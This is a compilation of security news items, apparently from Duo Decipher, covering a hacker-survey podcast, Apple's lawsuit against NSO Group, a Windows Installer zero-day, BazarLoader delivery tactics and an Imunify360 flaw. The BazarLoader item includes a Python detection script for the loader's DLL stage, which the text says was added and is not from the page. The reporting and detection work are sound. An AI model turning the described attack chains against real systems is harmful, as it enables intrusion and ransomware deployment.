And with the “Inside the Mind of a Hacker Report” I think the pandemic has driven a lot of introspection, in the community and on the researchers’ side, with people wanting to take better control of their destiny, so to speak, from a career standpoint: "I want to be in a position where I can actually have more of a direct input into what I'm getting back." And just thinking about the Great Resignation, sort of millennial midlife crisis thing that's happening right across the world, it has definitely played out in the hacker community in some ways that I think they're actually quite productive. Like 80 percent of the folk we surveyed had found vulnerabilities they'd not encountered before the pandemic; that was partly a product of technology change, but also because they're all learning new things, which I think is pretty awesome. On the tech side of it, 74 percent of the folks responded that vulnerabilities in general had increased since the onset of COVID-19. That whole idea of digital transformation and how quickly we all had to pivot to basically respond to the pandemic, like speed is the natural enemy of security when it comes to things like that. So, I've seen a lot of shifts in vulnerability patterns that do oftentimes look like a product of people just doing stuff quickly and not necessarily thinking through the downside. So I think we're going to continue to unpack how that's played out, over 2022 as well.

Lindsey O’Donnell-Welch: I’m curious about how the pandemic and this changing viewpoint of work and remote work is really having an impact on the InfoSec community overall.

Casey Ellis: Definitely, but I mean, my own experience of that is getting stuck on the opposite side of the planet for 18 months, like that was a thing. I think everyone's had some sort of version of that, in terms of ways that they've had to change how they operate and work. But you know, more generally, this idea of just access and distributed access. Like another piece in the “Inside the Mind of a Hacker Report” was 45 percent of the respondents believe that this restrictive scope actually inhibits the discovery of critical vulnerabilities that are meaningfully impactful to an organization. I think that's more true now. That's always something that I've believed is true, but it's more true now than it was before because everyone's accessing things from the outside. So this idea of, as an organization, it's not just your front door website, it's your entire entity, and all of the different ways into that. Ultimately, if I'm an attacker trying to get in and create an outcome, I don't care how I do it, I just want to get in. So scope needs to reflect that even more urgently next year than it has in the past.

Apple Sues NSO Group
Dennis Fisher (dennis@decipher.sc), Wed, 24 Nov 2021 00:00:00 -0500, https://duo.com/decipher/apple-sues-nso-group

Apple has filed a lawsuit against NSO Group, the maker of the notorious Pegasus spyware, alleging that the company has harmed Apple’s customers as well as Apple itself by abusing “Apple services and servers to perpetrate attacks on Apple’s users”.

The lawsuit is not unprecedented: Facebook’s WhatsApp division sued NSO Group in 2019 for unauthorized access to the company’s servers, and that’s part of the legal argument that Apple is using in its complaint. Apple alleges that NSO Group created more than 100 Apple IDs and used Apple’s iCloud servers to deliver an exploit payload to target devices, which then loaded the Pegasus spyware. The delivery method relied on an exploit that researchers named FORCEDENTRY, which exploited a zero-day in iOS 14.

“Defendants contacted Apple servers using their Apple IDs to confirm that the target was using an Apple device. Defendants would then send abusive data created by Defendants through Apple servers in the United States and abroad for purposes of this attack. The abusive data was sent to the target phone through Apple’s iMessage service, disabling logging on a targeted Apple device so that Defendants could surreptitiously deliver the Pegasus payload via a larger file. That larger file would be temporarily stored in an encrypted form unreadable to Apple on one of Apple’s iCloud servers in the United States or abroad for delivery to the target,” Apple said in the complaint, which was filed Tuesday in the U.S. District Court for the Northern District of California.

Researchers at Citizen Lab at the University of Toronto discovered the FORCEDENTRY exploit in September and notified Apple. Within a week of the notification, Apple released an update for iOS that closed the vulnerability on which FORCEDENTRY relied.

Apple is asking the court to permanently prevent NSO Group from using any Apple devices, software, or services, and is asking for monetary damages, as well. The company said it will donate any damages it wins to organizations doing research on cyber surveillance, and it also is pledging an additional $10 million to support those research efforts. Apple also said it has begun notifying the small number of people who have been targeted by the FORCEDENTRY exploit. Some activists in Thailand have already received notifications and have posted the emails on Twitter. The notifications will consist of an email, an iMessage text, and a banner at the top of the user's account page.

"State-sponsored attackers are very well-funded and sophisticated, and their attacks evolve over time. Detecting such attacks relies on threat intelligence signals that are often imperfect and incomplete. It’s possible that some Apple threat notifications may be false alarms, or that some attacks are not detected. We are unable to provide information about what causes us to issue threat notifications, as that may help state-sponsored attackers adapt their behavior to evade detection in the future," Apple said.

“Defendants are notorious hackers—amoral 21st century mercenaries who have created highly sophisticated cyber-surveillance machinery."

NSO Group has been the subject of more than a few legal actions lately, and the U.S. government has also sanctioned the Israeli company. In October, the Department of Commerce issued an interim final rule that essentially prevents Americans from selling exploits or vulnerabilities to some foreign entities, and earlier this month Commerce added NSO Group to its Entity List.

In its lawsuit, Apple said NSO Group’s actions have injured the company and its customers.

“Defendants are notorious hackers—amoral 21st century mercenaries who have created highly sophisticated cyber-surveillance machinery that invites routine and flagrant abuse. They design, develop, sell, deliver, deploy, operate, and maintain offensive and destructive malware and spyware products and services that have been used to target, attack, and harm Apple users, Apple products, and Apple,” Apple says in the lawsuit.

“For their own commercial gain, they enable their customers to abuse those products and services to target individuals including government officials, journalists, businesspeople, activists, academics, and even U.S. citizens.”

“At Apple, we are always working to defend our users against even the most complex cyberattacks. The steps we’re taking today will send a clear message: In a free society, it is unacceptable to weaponize powerful state-sponsored spyware against those who seek to make the world a better place,” said Ivan Krstić, head of Apple Security Engineering and Architecture.

Malware Samples Target Windows Installer Flaw
Lindsey O’Donnell-Welch (lindsey@decipher.sc), Wed, 24 Nov 2021 00:00:00 -0500, https://duo.com/decipher/malware-targets-windows-installer-zero-day

Researchers are warning of malware samples in the wild that they say are attempting to take advantage of a recently disclosed zero-day flaw in Microsoft's Windows Installer software component.

The flaw allows an attacker with access to a limited user account to obtain administrator privileges. The issue stems from an insufficient patch of CVE-2021-41379, which was issued on Nov. 9 as part of Microsoft’s Patch Tuesday security updates. On Nov. 22, the researcher who originally discovered the flaw, Abdelhamid Naceri, released proof-of-concept (PoC) exploit code on GitHub. Naceri - and other security researchers - confirmed the exploit code worked despite the fix.

Microsoft initially ranked CVE-2021-41379 as a medium-severity flaw, with a CVSS base score of 5.5. In order to exploit this initial flaw, an attacker must already have access to the targeted system, and must be able to execute low-privilege code.

However, “the release of functional proof-of-concept exploit code will certainly drive additional abuse of this vulnerability,” said Jaeson Schultz, technical leader with Cisco Talos, in a Tuesday threat advisory. So far, three malware samples relating to the vulnerability have been discovered, with the first appearing on Nov. 21, he said.

"This is a privilege escalation bug, so it could be added to an attacker's arsenal for escalation to admin privileges," Schultz said. "Based on the filenames associated with the samples, it appears that these malicious binaries were compiled by someone testing out the zero-day vulnerability. These could be either other security researchers experimenting with the proof-of-concept code, or it could be miscreants preparing for an attack."

Schultz said that as of the publication of the blog, there is no patch available from Microsoft. Microsoft did not respond to inquiries regarding a timeline for a potential fix.

With CVE-2021-41379, an attacker could abuse the Windows Installer service - the Microsoft Windows component used for the installation, maintenance, and removal of software - by creating a junction. The PoC exploit code for the bypass of the patch, meanwhile, allows an attacker to overwrite the discretionary access control list (DACL) for the Microsoft Edge Elevation Service; a DACL specifies which users are allowed or denied access to a securable object. This would allow a potential attacker to replace any executable file on the system with an MSI file, and run code as an administrator. The flaw impacts versions of Microsoft Windows, including Windows 11 and Server 2022, said researchers.

"This flaw would let the attackers run code as an administrator on that system," said Schultz. "That could be used to download/install additional software, exfiltrate data from the compromised system, or even modify/delete data from the compromised system. Essentially they would have complete control."

This zero-day flaw is only the latest to afflict Microsoft products. The company earlier this month released patches for a remote code execution vulnerability in Exchange Server, which was being exploited in the wild. The important-severity flaw (CVE-2021-42321) stemmed from an improper validation of cmdlet arguments, which are commands used in the PowerShell environment. Researchers with Fortinet's FortiGuard Labs on Tuesday said that PoC exploit code has been released for this flaw. Microsoft also released fixes for an important-severity security feature bypass zero-day (CVE-2021-42292) in Microsoft Excel.

Decipher Podcast: Casey Ellis
Lindsey O’Donnell-Welch (lindsey@decipher.sc), Tue, 23 Nov 2021 08:00:00 -0500, https://duo.com/decipher/decipher-podcast-casey-ellis

BazarLoader Attacks Use Compromised Software Installers
Lindsey O’Donnell-Welch (lindsey@decipher.sc), Tue, 23 Nov 2021 00:00:00 -0500, https://duo.com/decipher/bazarloader-malware-expands-delivery-tactics

Researchers have observed the BazarLoader information stealer, known for providing initial access for various ransomware affiliates, expanding its delivery methods to now include the use of compromised software installers and the abuse of ISO files.

The loader, which was first observed in April 2020, primarily acts as a delivery mechanism for second-stage malware, including several high-profile ransomware families like Ryuk, Conti and Zeppelin. Over the past year, researchers have observed an increase in BazarLoader (along with Trickbot) deliveries, which they said have likely led to a corresponding increase in Conti ransomware attacks since June.

“The number of arrival mechanism variations used in BazarLoader campaigns continues to increase as threat actors diversify their attack patterns to evade detection,” said Ian Kenefick, threat analyst with Trend Micro, in a Tuesday analysis.

Previously, BazarLoader relied on a unique delivery mechanism that researchers with Proofpoint said they observed since February, which leveraged a combination of emails and phone-based “customer service representatives” for carrying out attacks. Here, spam emails instructed victims to call a phone number, which led to an attacker-controlled call center that gave victims a URL and directed them to download a malicious file. This tactic also helped attackers bypass email protection filters that would block out malicious links or attachments. Researchers with Palo Alto Network’s Unit 42 team in July also observed BazarLoader spread via a copyright violation-themed campaign using ZIP archives, and through English-language emails sent by the TA551 threat group.

In new attacks, which targeted victims in the Americas, researchers observed BazarLoader attackers expanding their delivery methods to use legitimate, compromised installers - versions of the VLC media player and TeamViewer remote access and remote control software - and convincing victims to download them. After these installers loaded, they dropped a BazarLoader executable, which is another notable difference from recent BazarLoader delivery methods that instead relied on dynamic link libraries (DLLs).

“While the initial delivery mechanism has yet to be identified, it’s possible that the use of these packages is part of a wider social engineering technique to deceive users into downloading and implementing the compromised installers,” said researchers.

“The number of arrival mechanism variations used in BazarLoader campaigns continues to increase as threat actors diversify their attack patterns to evade detection."

Another recently observed delivery method abused ISO files, archive files containing an identical copy (or image) of data found on an optical disc. Here, the abused ISO file would download a Windows shortcut (LNK) and a DLL payload. The LNK file used a folder icon on victims’ systems in order to deceive them into clicking on the icon; once clicked, the enclosed BazarLoader DLL file would run. The DLL then called an export function previously used by BazarLoader, “EnterDLL,” to load a malicious DLL and communicate with the command-and-control (C2) server. This then spawned a suspended Microsoft Edge process to inject itself into it, said researchers.
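As an added defender-side illustration (constructed for this article, not code from Trend Micro or from the page), the following Python sketch flags the DLL stage of the ISO/LNK chain described above in process-creation telemetry. It assumes, which the article does not state, that the DLL is started through rundll32.exe with the EnterDLL export named on the command line, and that telemetry is available with Sysmon-like fields (pid, ppid, image, cmdline).

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Export name the article attributes to BazarLoader's DLL stage.
SUSPECT_EXPORT = "EnterDLL"
# Assumption (not on the page): the DLL is started through a standard DLL host.
DLL_HOSTS = {"rundll32.exe", "regsvr32.exe"}
# The article describes a suspended Edge process used as the injection target.
BROWSERS = {"msedge.exe"}
# Constructed heuristic: a mounted ISO shows up as a new drive letter, so a DLL
# from it will not live under the Windows or Program Files trees.
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# rundll32 syntax is "<dll path>,<export>"; capture the DLL path that precedes the export.
_EXPORT_RE = re.compile(r'"?([^",]+\.dll)"?\s*,\s*' + SUSPECT_EXPORT + r"\b", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record with Sysmon-like fields (constructed format)."""
    pid: int
    ppid: int
    image: str      # executable basename, e.g. "rundll32.exe"
    cmdline: str


def suspicious_dll_load(ev: ProcEvent) -> list[str]:
    """Return the reasons a single event resembles the BazarLoader DLL stage (empty if none)."""
    reasons: list[str] = []
    if ev.image.lower() not in DLL_HOSTS:
        return reasons
    match = _EXPORT_RE.search(ev.cmdline)
    if not match:
        return reasons
    reasons.append(f"{ev.image} invokes export {SUSPECT_EXPORT}")
    dll_path = match.group(1).strip().lower()
    if not dll_path.startswith(TRUSTED_DLL_DIRS):
        reasons.append(f"DLL loaded from untrusted location {dll_path}")
    return reasons


def detect_chain(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map pid -> reasons for each DLL-host process that matches, adding a reason
    when that process then spawns a browser, as in the injection step on the page."""
    findings: dict[int, list[str]] = {}
    for ev in events:
        reasons = suspicious_dll_load(ev)
        if reasons:
            findings[ev.pid] = reasons
    for ev in events:
        if ev.image.lower() in BROWSERS and ev.ppid in findings:
            findings[ev.ppid].append(f"spawned {ev.image} (pid {ev.pid}) as injection host")
    return findings


# Constructed sample telemetry: a benign rundll32 use (Control Panel applet) and a
# chain resembling the article: shortcut opened from an ISO mounted as E:, DLL with
# the EnterDLL export, then Edge started by that rundll32.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(101, 100, "rundll32.exe", "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"),
    ProcEvent(102, 100, "rundll32.exe", 'rundll32.exe "E:\\Documents\\loader.dll",EnterDLL'),
    ProcEvent(103, 102, "msedge.exe", '"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"'),
]

if __name__ == "__main__":
    for pid, reasons in detect_chain(SAMPLE_EVENTS).items():
        print(f"pid {pid}:", *reasons, sep="\n  ")
```

Only the rundll32 process that names the EnterDLL export from a non-system path and then launches Edge is reported; the Control Panel applet launch is left alone.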

While neither of these two techniques are novel, researchers said they indicate how BazarLoader is expanding its delivery capabilities in an effort to sidestep detection.

“For instance, while the use of compromised installers has been observed with other malware, the large file size can still challenge detection solutions — such as sandboxes — which may implement file size limits,” Kenefick said. “On the other hand, LNK files serving as shortcuts will also likely be obfuscated for the additional layers created between the shortcut and the malicious files itself.”

Researchers warn that the loader will continue to evolve, and stress that BazarLoader detections should be prioritized as ransomware attacks continue to pose a challenge to organizations. BazarLoader has several troubling capabilities allowing ransomware affiliates to conduct reconnaissance, including the ability to root out decoy systems or analysis and sandbox environments. Reconnaissance also helps ransomware operators filter infected environments to those more likely to yield a ransom payout.

“The deployment of BazarLoader malware for initial access is a known technique for modern ransomware such as Conti and Ryuk as service affiliates,” said researchers. “Aside from these known ransomware families including more tools for entry into their arsenal, other malware groups and ransomware operators may pick up on the additional means, if they have not already done so.”

Imunify360 Flaw Can Lead to Code Execution
Dennis Fisher (dennis@decipher.sc), Tue, 23 Nov 2021 00:00:00 -0500, https://duo.com/decipher/imunify360-flaw-can-lead-to-code-execution

There is a vulnerability in some versions of the Imunify360 web server security platform that can allow an attacker to execute arbitrary code in some specific circumstances.

The vulnerability is a PHP deserialization issue and it exists in versions 5.8 and 5.9 of Imunify360, a product designed to detect malware and other security issues on web-hosting servers. Researchers at Cisco Talos discovered the vulnerability, which is in the Ai-Bolit functionality of the product. The researchers found that an attacker can exploit it in a couple of different ways.

The flaw “could be triggered automatically just after the attacker creates a malicious file in the system if Imunify is configured with real-time file system scanning. It could also be triggered if the user scans a malicious file provided by the attacker with Ai-Bolit scanner. The attacker could cause a deserialization condition with controllable data and then execute arbitrary code,” the Talos advisory says.

The specific component that contains the vulnerability, Ai-Bolit, is installed by default and is meant to scan files for malware. Talos reported the flaw to CloudLinux, which sells Imunify360, and the vendor released fixed versions to address it.

Server administrators running vulnerable versions of Imunify360 should upgrade as soon as possible, especially now that information about the vulnerability is public.